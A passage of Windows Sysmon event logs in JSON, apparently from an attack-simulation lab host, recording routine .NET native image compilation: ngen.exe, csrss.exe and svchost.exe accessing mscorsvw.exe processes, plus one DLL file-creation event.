07:02:51.888","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1391-5F25-0000-0010020B1000}","TargetProcessId":"4720","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8755,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:51.888\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1391-5F25-0000-0010020B1000}\r\nTargetProcessId: 4720\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:51.888","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1391-5F25-0000-0010020B1000}","TargetProcessId":"4720","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8756,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:51.904\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-139B-5F25-0000-0010E3761000}\r\nTargetProcessId: 4720\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:51.904","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-139B-5F25-0000-0010E3761000}","TargetProcessId":"4720","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8757,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:51.935\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-139B-5F25-0000-00100F7A1000}\r\nTargetProcessId: 4232\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:51.935","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-139B-5F25-0000-00100F7A1000}","TargetProcessId":"4232","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8758,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:51.935\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-139B-5F25-0000-00100F7A1000}\r\nTargetProcessId: 4232\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:51.935","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-139B-5F25-0000-00100F7A1000}","TargetProcessId":"4232","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8759,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:51.935\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-139B-5F25-0000-00100F7A1000}\r\nTargetProcessId: 4232\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:51.935","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-139B-5F25-0000-00100F7A1000}","TargetProcessId":"4232","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8760,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:02:52.060\r\nProcessGuid: {E2A3D6B1-139B-5F25-0000-00100F7A1000}\r\nProcessId: 4232\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1088-0\\System.Windows.Input.Manipulations.dll\r\nCreationUtcTime: 2020-08-01 07:02:52.060","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:02:52.060","ProcessGuid":"{E2A3D6B1-139B-5F25-0000-00100F7A1000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1088-0\\System.Windows.Input.Manipulations.dll","CreationUtcTime":"2020-08-01 07:02:52.060","EventReceivedTime":"2020-08-01 07:02:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8761,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:52.091\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-139C-5F25-0000-0010697D1000}\r\nTargetProcessId: 3284\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:52.091","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-139C-5F25-0000-0010697D1000}","TargetProcessId":"3284","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8762,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:52.091\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-139C-5F25-0000-0010697D1000}\r\nTargetProcessId: 3284\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:52.091","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-139C-5F25-0000-0010697D1000}","TargetProcessId":"3284","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8763,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:52.107\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-139C-5F25-0000-0010697D1000}\r\nTargetProcessId: 3284\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 